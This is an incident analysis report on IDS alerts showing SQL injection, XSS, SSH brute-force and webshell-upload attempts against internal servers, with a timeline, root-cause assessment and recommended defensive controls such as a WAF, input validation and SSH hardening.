Rabbi Alacks

Incident Analysis Report Codename: Incident Webstorm-1125 Date of Detection: November 3, 2025 Analysts: Alacks Rabbi, Fapohunda Israel, Chioma Mbidom Source: Intrusion Detection System (IDS) Logs Classification: Confirmed External Attack Attempts 1. Executive Summary Between 10:25 and 10:35 UTC on November 3, 2025, the organization’s Intrusion Detection System (IDS) recorded a sequence of high-severity alerts directed at internal servers in the 10.0.0.x subnet. The alerts indicated coordinated external intrusion attempts targeting web and SSH services, including SQL Injection, Cross-Site Scripting (XSS), SSH brute-force, and a possible remote code execution attempt via malicious file upload. These incidents demonstrate a structured attack chain — beginning with reconnaissance and vulnerability probing, followed by exploitation attempts to gain persistent access to the network. The overall risk rating for this event is assessed as High due to the presence of multiple critical alerts within a short time frame. 2. Incident Timeline Timestamp Alert Description Source IP Destination IP Severity Potential Impact 10:25 Possible SQL Injection attempt detected. - 10.0.0.20 High Database compromise 10:27 Suspicious POSTs with script tags (XSS). - 10.0.0.20 Medium Credential theft 10:29 Suspicious user-agent accessing admin pages. - 10.0.0.21 Low Reconnaissance 10:32 SSH login failures detected. - 10.0.0.22 High Unauthorized access 10:35 Suspicious .php file upload detected. - 10.0.0.20 High Webshell deployment 3. Technical Analysis All suspicious traffic originated from external IP addresses in public ranges -.x,-.x, and 192.0.2.x). There were no signs of outbound or internally initiated (192.168.x.x) attacks, confirming that this was an inbound intrusion attempt from outside the organization’s perimeter. The affected systems included the web application server (10.0.0.20), administrative portal (10.0.0.21), and SSH server (10.0.0.22). The final file upload alert strongly suggests an attempt to deploy a webshell or remote access script, representing the attacker’s next stage after scanning and exploitation testing. 4. Root Cause and Impact Assessment Root Cause: Insufficient web application input sanitization and upload control allowed potential injection and file upload attempts. SSH brute-force activity indicates weak access controls and lack of rate-limiting. Potential Impact: Database exfiltration, remote code execution, privilege escalation, or lateral movement within the network. 5. Preventive and Corrective Actions Control Area Recommendation Web Application Firewall (WAF) Deploy WAF to block SQLi, XSS, and file uploads. Expected Benefit Prevents most web-based exploits. Input Validation & Encoding Use server-side validation and parameterized queries. Eliminates injection vulnerabilities. File Upload Restrictions Restrict executable file uploads. Prevents webshell uploads. SSH Hardening Enforce key-based login and fail2ban. Blocks brute-force attempts. Network Segmentation Isolate web servers from internal systems. Limits attack spread. Threat Intelligence Blocking Block known malicious IPs. Stops repeat attacks. Multi-Factor AuthenticationRequire MFA for admins. Strengthens login security. 6. Lessons Learned and Conclusion Incident Webstorm-1125 highlights the importance of defense-in-depth and proactive monitoring. While the IDS successfully detected multiple attack phases, the event exposed weaknesses in application-layer security and SSH access management. No internal compromise was confirmed, but the presence of a suspicious file upload underscores the need for immediate patching, continuous monitoring, and stronger preventive controls. Implementing a WAF, stricter input validation, and SSH hardening will help prevent similar incidents in the future. Prepared by: Alacks Rabbi, Fapohunda Israel, Chioma Mbidom Date: November 12, 2025